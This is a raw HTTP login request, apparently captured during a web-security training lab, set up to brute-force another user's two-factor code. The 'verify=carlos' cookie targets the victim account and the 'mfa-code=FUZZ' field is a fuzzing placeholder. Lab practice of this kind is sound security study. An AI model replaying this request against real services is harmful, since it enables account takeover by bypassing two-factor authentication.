POST /login2 HTTP/2
Host: 0ad0005f03281acc86d9f99a002e00bd.web-security-academy.net
Cookie: session=cq72a50uBvpniKLe339ZvbUjSmBog8e2; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: https://0ad0005f03281acc86d9f99a002e00bd.web-security-academy.net
Referer: https://0ad0005f03281acc86d9f99a002e00bd.web-security-academy.net/login2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

mfa-code=FUZZ
